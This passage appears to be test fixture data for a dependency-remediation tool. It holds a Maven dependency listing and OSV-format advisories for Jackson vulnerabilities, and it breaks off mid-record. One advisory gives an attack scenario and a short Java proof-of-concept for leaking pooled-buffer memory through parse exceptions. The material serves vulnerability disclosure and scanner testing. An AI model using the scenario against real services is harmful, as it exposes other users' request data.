org.seleniumhq.selenium:selenium-remote-driver@2.48.2 Opt|junit:junit@4.12 Opt|org.testng:testng@6.8 org.seleniumhq.selenium:selenium-parent 2.48.2 org.seleniumhq.selenium:selenium-remote-driver 2.48.2 cglib:cglib-nodep@2.1_3 com.google.code.gson:gson@2.3.1 org.seleniumhq.selenium:selenium-api@2.48.2 org.apache.httpcomponents:httpclient@4.5.1 com.google.guava:guava@18.0 org.apache.commons:commons-exec@1.3 net.java.dev.jna:jna@4.1.0 net.java.dev.jna:jna-platform@4.1.0 org.seleniumhq.selenium:selenium-safari-driver 2.48.2 org.seleniumhq.selenium:selenium-remote-driver@2.48.2 org.webbitserver:webbit@0.4.14 org.seleniumhq.selenium:selenium-support 2.48.2 org.seleniumhq.selenium:selenium-remote-driver@2.48.2 Opt|org.hamcrest:hamcrest-all@1.3 Opt|junit:junit@4.12 org.slf4j:jcl-over-slf4j 1.7.35 org.slf4j:slf4j-api@1.7.35 org.slf4j:slf4j-api 1.7.5 1.7.7 1.7.26 1.7.30 1.7.35 1.7.36 org.slf4j:slf4j-log4j12 1.7.10 org.slf4j:slf4j-api@1.7.10 log4j:log4j@1.2.17 org.slf4j:slf4j-parent 1.7.5 1.7.7 1.7.10 1.7.26 1.7.30 1.7.35 1.7.36 org.slf4j:slf4j-reload4j 1.7.35 org.slf4j:slf4j-api@1.7.35 ch.qos.reload4j:reload4j@1.2.18.3 org.sonatype.forge:forge-parent 6 org.sonatype.oss:oss-parent 3 5 6 7 9 org.sonatype.sisu.inject:cglib 2.2.1-v20090111 asm:asm@3.1 Opt|asm:asm-util@3.1 Opt|org.apache.ant:ant@1.8.1 org.testcontainers:junit-jupiter 1.19.0 org.testcontainers:testcontainers@1.19.0 org.testcontainers:neo4j 1.19.0 org.testcontainers:testcontainers@1.19.0 org.testcontainers:testcontainers 1.19.0 junit:junit@4.13.2 org.slf4j:slf4j-api@1.7.36 org.apache.commons:commons-compress@1.23.0 org.rnorth.duct-tape:duct-tape@1.0.8 com.github.docker-java:docker-java-api@3.3.3 com.github.docker-java:docker-java-transport-zerodep@3.3.3 Scope provided|com.google.cloud.tools:jib-core@0.23.0 org.testcontainers:testcontainers-bom 1.16.1 1.19.8 1.20.1 1.20.4 org.w3c.css:sac 1.3 org.webbitserver:webbit 0.4.14 io.netty:netty@3.5.2.Final org.xerial.snappy:snappy-java 1.0.4.1 Scope provided|org.osgi:core@4.3.0 xalan:serializer 2.7.2 xml-apis:xml-apis@1.3.04 Opt|xerces:xercesImpl@2.9.1 xalan:xalan 2.7.2 xalan:serializer@2.7.2 Opt|xerces:xercesImpl@2.9.1 2.7.3 xerces:xercesImpl 2.11.0 xml-apis:xml-apis@1.4.01 Opt|xml-resolver:xml-resolver@1.2 2.12.0 xml-apis:xml-apis@1.4.01 Opt|xml-resolver:xml-resolver@1.2 2.12.1 xml-apis:xml-apis@1.4.01 Opt|xml-resolver:xml-resolver@1.2 2.12.2 xml-apis:xml-apis@1.4.01 Opt|xml-resolver:xml-resolver@1.2 xml-apis:xml-apis 1.4.01 xmlenc:xmlenc 0.52 ================================================ FILE: internal/remediation/testdata/zeppelin-server/vulns.json ================================================ { "vulns": [ { "schema_version": "1.7.3", "id": "GHSA-h46c-h94j-95f3", "published": "2025-06-27T15:22:22Z", "modified": "2025-06-27T16:03:13.670847Z", "aliases": [ "CVE-2025-52999" ], "related": [ "CGA-88hr-3c27-vpx8", "CGA-m7mg-3mjw-9pmv" ], "summary": "jackson-core can throw a StackoverflowError when processing deeply nested data", "details": "### Impact\nWith older versions of jackson-core, if you parse an input file and it has deeply nested data, Jackson could end up throwing a StackoverflowError if the depth is particularly large.\n\n### Patches\njackson-core 2.15.0 contains a configurable limit for how deep Jackson will traverse in an input document, defaulting to an allowable depth of 1000. Change is in https://github.com/FasterXML/jackson-core/pull/943. jackson-core will throw a StreamConstraintsException if the limit is reached.\njackson-databind also benefits from this change because it uses jackson-core to parse JSON inputs.\n\n### Workarounds\nUsers should avoid parsing input files from untrusted sources.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-core", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.15.0" } ] } ], "versions": [ "2.0.0", "2.0.0-RC1", "2.0.0-RC2", "2.0.0-RC3", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.10.0", "2.10.0.pr1", "2.10.0.pr2", "2.10.0.pr3", "2.10.1", "2.10.2", "2.10.3", "2.10.4", "2.10.5", "2.11.0", "2.11.0.rc1", "2.11.1", "2.11.2", "2.11.3", "2.11.4", "2.12.0", "2.12.0-rc1", "2.12.0-rc2", "2.12.1", "2.12.2", "2.12.3", "2.12.4", "2.12.5", "2.12.6", "2.12.7", "2.13.0", "2.13.0-rc1", "2.13.0-rc2", "2.13.1", "2.13.2", "2.13.3", "2.13.4", "2.13.5", "2.14.0", "2.14.0-rc1", "2.14.0-rc2", "2.14.0-rc3", "2.14.1", "2.14.2", "2.14.3", "2.15.0-rc1", "2.15.0-rc2", "2.15.0-rc3", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.6", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-h46c-h94j-95f3/GHSA-h46c-h94j-95f3.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/FasterXML/jackson-core/security/advisories/GHSA-h46c-h94j-95f3" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-52999" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-core/pull/943" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-core" } ], "database_specific": { "cwe_ids": [ "CWE-121" ], "github_reviewed": true, "github_reviewed_at": "2025-06-27T15:22:22Z", "nvd_published_at": "2025-06-25T17:15:39Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-wf8f-6423-gfxg", "published": "2025-06-07T00:10:42Z", "modified": "2025-06-07T00:54:46.814569Z", "aliases": [ "CVE-2025-49128" ], "related": [ "CGA-679q-pc95-xgm4", "CGA-w99f-h8p7-76rg", "CVE-2025-49128" ], "summary": "Jackson-core Vulnerable to Memory Disclosure via Source Snippet in JsonLocation", "details": "### Overview\n\nA flaw in Jackson-core's `JsonLocation._appendSourceDesc` method allows up to 500 bytes of unintended memory content to be included in exception messages. When parsing JSON from a byte array with an offset and length, the exception message incorrectly reads from the beginning of the array instead of the logical payload start. This results in possible **information disclosure** in systems using **pooled or reused buffers**, like Netty or Vert.x.\n\n### Details\n\nThe vulnerability affects the creation of exception messages like:\n\n```\nJsonParseException: Unexpected character ... at [Source: (byte[])...]\n```\n\nWhen `JsonFactory.createParser(byte[] data, int offset, int len)` is used, and an error occurs while parsing, the exception message should include a snippet from the specified logical payload. However, the method `_appendSourceDesc` ignores the `offset`, and always starts reading from index `0`.\n\nIf the buffer contains residual sensitive data from a previous request, such as credentials or document contents, that data may be exposed if the exception is propagated to the client.\n\nThe issue particularly impacts server applications using:\n\n* Pooled byte buffers (e.g., Netty)\n* Frameworks that surface parse errors in HTTP responses\n* Default Jackson settings (i.e., `INCLUDE_SOURCE_IN_LOCATION` is enabled)\n\nA documented real-world example is [CVE-2021-22145](https://nvd.nist.gov/vuln/detail/CVE-2021-22145) in Elasticsearch, which stemmed from the same root cause.\n\n### Attack Scenario\n\nAn attacker sends malformed JSON to a service using Jackson and pooled byte buffers (e.g., Netty-based HTTP servers). If the server reuses a buffer and includes the parser’s exception in its HTTP 400 response, the attacker may receive residual data from previous requests.\n\n### Proof of Concept\n\n```java\nbyte[] buffer = new byte[1000];\nSystem.arraycopy(\"SECRET\".getBytes(), 0, buffer, 0, 6);\nSystem.arraycopy(\"{ \\\"bad\\\": }\".getBytes(), 0, buffer, 700, 10);\n\nJsonFactory factory = new JsonFactory();\nJsonParser parser = factory.createParser(buffer, 700, 20);\nparser.nextToken(); // throws exception\n\n// Exception message will include \"SECRET\"\n```\n\n### Patches\nThis issue was silently fixed in jackson-core version 2.13.0, released on September 30, 2021, via [PR #652](https://github.com/FasterXML/jackson-core/pull/652).\n\nAll users should upgrade to version 2.13.0 or later.\n\n### Workarounds\nIf upgrading is not immediately possible, applications can mitigate the issue by:\n\n1. **Disabling exception message exposure to clients** — avoid returning parsing exception messages in HTTP responses.\n2. **Disabling source inclusion in exceptions** by setting:\n\n ```java\n jsonFactory.disable(JsonFactory.Feature.INCLUDE_SOURCE_IN_LOCATION);\n ```\n\n This prevents Jackson from embedding any source content in exception messages, avoiding leakage.\n\n\n### References\n* [Pull Request #652 (Fix implementation)](https://github.com/FasterXML/jackson-core/pull/652)\n* [CVE-2021-22145 (Elasticsearch exposure of this flaw)](https://nvd.nist.gov/vuln/detail/CVE-2021-22145)", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-core", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.13.0" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.10.0", "2.10.0.pr1", "2.10.0.pr2", "2.10.0.pr3", "2.10.1", "2.10.2", "2.10.3", "2.10.4", "2.10.5", "2.11.0", "2.11.0.rc1", "2.11.1", "2.11.2", "2.11.3", "2.11.4", "2.12.0", "2.12.0-rc1", "2.12.0-rc2", "2.12.1", "2.12.2", "2.12.3", "2.12.4", "2.12.5", "2.12.6", "2.12.7", "2.13.0-rc1", "2.13.0-rc2", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.6", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-wf8f-6423-gfxg/GHSA-wf8f-6423-gfxg.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/FasterXML/jackson-core/security/advisories/GHSA-wf8f-6423-gfxg" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-22145" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-49128" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-core/pull/652" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-core/commit/a6c297682737dde13337cb7c3020f299518609a8" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-core" } ], "database_specific": { "cwe_ids": [ "CWE-209" ], "github_reviewed": true, "github_reviewed_at": "2025-06-07T00:10:42Z", "nvd_published_at": "2025-06-06T22:15:23Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-27xj-rqx5-2255", "published": "2020-05-15T18:58:44Z", "modified": "2024-02-16T08:06:12.878312Z", "aliases": [ "CVE-2020-11619" ], "summary": "jackson-databind mishandles the interaction between serialization gadgets and typing", "details": "FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.springframework.aop.config.MethodLocatingFactoryBean (aka spring-aop).", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10.4" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.10.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/05/GHSA-27xj-rqx5-2255/GHSA-27xj-rqx5-2255.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11619" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2680" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200511-0004" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-04-23T19:32:22Z", "nvd_published_at": "2020-04-07T23:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-288c-cq4h-88gq", "published": "2021-02-18T20:51:54Z", "modified": "2024-10-22T05:28:57.400652Z", "aliases": [ "CGA-jp8x-p2pf-pcp2", "CVE-2020-25649" ], "summary": "XML External Entity (XXE) Injection in Jackson Databind", "details": "A flaw was found in FasterXML Jackson Databind, where it did not have entity expansion secured properly. This flaw allows vulnerability to XML external entity (XXE) attacks. The highest threat from this vulnerability is data integrity.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.6.0" }, { "fixed": "2.6.7.4" } ] } ], "versions": [ "2.6.0", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.6.7.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/02/GHSA-288c-cq4h-88gq/GHSA-288c-cq4h-88gq.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0.0" }, { "fixed": "2.9.10.7" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.10.5", "2.9.10.6", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.10.6", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/02/GHSA-288c-cq4h-88gq/GHSA-288c-cq4h-88gq.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.10.0.0" }, { "fixed": "2.10.5.1" } ] } ], "versions": [ "2.10.0", "2.10.0.pr1", "2.10.0.pr2", "2.10.0.pr3", "2.10.1", "2.10.2", "2.10.3", "2.10.4", "2.10.5" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.10.5.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/02/GHSA-288c-cq4h-88gq/GHSA-288c-cq4h-88gq.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-25649" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2589" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/3d932709abd0b5390efe67451653fc9efa9db677" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/612f971b78c60202e9cd75a299050c8f2d724a59" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc82ff47853289e9cd17f5cfbb053c04cafc75ee32e3d7223963f83bb@%3Cdev.knox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc15e90bbef196a5c6c01659e015249d6c9a73581ca9afb8aeecf00d2@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbf4ce74b0d1fa9810dec50ba3ace0caeea677af7c27a97111c06ccb7@%3Cusers.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbf4ce74b0d1fa9810dec50ba3ace0caeea677af7c27a97111c06ccb7@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb674520b9f6c808c1bf263b1369e14048ec3243615f35cfd24e33604@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raf13235de6df1d47a717199e1ecd700dff3236632f5c9a1488d9845b@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra95faf968f3463acb3f31a6fbec31453fc5045325f99f396961886d3@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra409f798a1e5a6652b7097429b388650ccd65fd958cee0b6f69bba00@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra1157e57a01d25e36b0dc17959ace758fc21ba36746de29ba1d8b130@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r98bfe3b90ea9408f12c4b447edcb5638703d80bc782430aa0c210a54@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r95a297eb5fd1f2d3a2281f15340e2413f952e9d5503296c3adc7201a@%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r94c7e86e546120f157264ba5ba61fd29b3a8d530ed325a9b4fa334d7@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r91722ecfba688b0c565675f8bf380269fde8ec62b54d6161db544c22@%3Ccommits.karaf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r90d1e97b0a743cf697d89a792a9b669909cc5a1692d1e0083a22e66c@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r900d4408c4189b376d1ec580ea7740ea6f8710dc2f0b7e9c9eeb5ae0@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8ae961c80930e2717c75025414ce48a432cea1137c02f648b1fb9524@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8937a7160717fe8b2221767163c4de4f65bc5466405cb1c5310f9080@%3Cusers.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210108-0007" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6X2UT4X6M7DLQYBOOHMXBWGYJ65RL2CT" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1809a1374041a969d77afab21fc38925de066bc97e86157d3ac3402@%3Ccommits.karaf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re96dc7a13e13e56190a5d80f9e5440a0d0c83aeec6467b562fbf2dca@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re16f81d3ad49a93dd2f0cba9f8fc88e5fb89f30bf9a2ad7b6f3e69c1@%3Ccommits.karaf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdf9a34726482222c90d50ae1b9847881de67dde8cfde4999633d2cdc@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdca8711bb7aa5d47a44682606cd0ea3497e2e922f22b7ee83e81e6c1@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd6f6bf848c2d47fa4a85c27d011d948778b8f7e58ba495968435a0b3@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd57c7582adc90e233f23f3727db3df9115b27a823b92374f11453f34@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd317f15a675d114dbf5b488d27eeb2467b4424356b16116eb18a652d@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc959cdb57c4fe198316130ff4a5ecbf9d680e356032ff2e9f4f05d54@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc88f2fa2b7bd6443921727aeee7704a1fb02433e722e2abf677e0d3d@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5f8a1608d758936bd6bbc5eed980777437b611537bf6fff40663fc71@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5b130fe668503c4b7e2caf1b16f86b7f2070fd1b7ef8f26195a2ffbd@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r45e7350dfc92bb192f3f88e9971c11ab2be0953cc375be3dda5170bd@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r407538adec3185dd35a05c9a26ae2f74425b15132470cf540f41d85b@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3e6ae311842de4e64c5d560a475b7f9cc7e0a9a8649363c6cf7537eb@%3Ccommits.karaf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r31f4ee7d561d56a0c2c2c6eb1d6ce3e05917ff9654fdbfec05dc2b83@%3Ccommits.servicecomb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2f5c5479f99398ef344b7ebd4d90bc3316236c45d0f3bc42090efcd7@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2eb66c182853c69ecfb52f63d3dec09495e9b65be829fd889a081ae1@%3Cdev.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2b6ddb3a4f4cd11d8f6305011e1b7438ba813511f2e3ab3180c7ffda@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2882fc1f3032cd7be66e28787f04ec6f1874ac68d47e310e30ff7eb1@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b7ed0c4b6c4301d4dfd6fdbc5581b0a789d3240cab55d766f33c6c6@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0b8dc3acd4503e4ecb6fbd6ea7d95f59941168d8452ac0ab1d1d96bb@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0881e23bd9034c8f51fdccdc8f4d085ba985dcd738f8520569ca5c3d@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r04529cedaca40c2ff90af4880493f9c88a8ebf4d1d6c861d23108a5a@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r024b7bda9c43c5560d81238748775c5ecfe01b57280f90df1f773949@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r011d1430e8f40dff9550c3bc5d0f48b14c01ba8aecabd91d5e495386@%3Ccommits.turbine.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1887664" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8937a7160717fe8b2221767163c4de4f65bc5466405cb1c5310f9080@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8764bb835bcb8e311c882ff91dd3949c9824e905e880930be56f6ba3@%3Cuser.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r86c78bf7656fdb2dab69cbf17f3d7492300f771025f1a3a65d5e5ce5@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7cb5b4b3e4bd41a8042e5725b7285877a17bcbf07f4eb3f7b316af60@%3Creviews.iotdb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r78d53a0a269c18394daf5940105dc8c7f9a2399503c2e78be20abe7e@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r765283e145049df9b8998f14dcd444345555aae02b1610cfb3188bf8@%3Cnotifications.iotdb.apache.org%3E" }, { "type": "WEB", "url": 